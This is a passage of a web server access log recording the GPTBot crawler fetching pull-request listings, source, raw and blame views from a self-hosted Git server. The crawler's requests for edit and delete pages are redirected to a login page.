+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:17:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 12297] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 13067] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 16048] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:17:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18373] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:17:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14710] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" +[17/Feb/2026:17:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:17:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:24:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 9843] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12658] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 11706] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11778] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:17:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11429] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" +[17/Feb/2026:17:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" +[17/Feb/2026:17:24:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/calculator.py" +[17/Feb/2026:17:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:24:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:24:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" +[17/Feb/2026:17:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11664] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" +[17/Feb/2026:17:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:17:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19512] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19513] [Gzip 6.47] [Sent-to 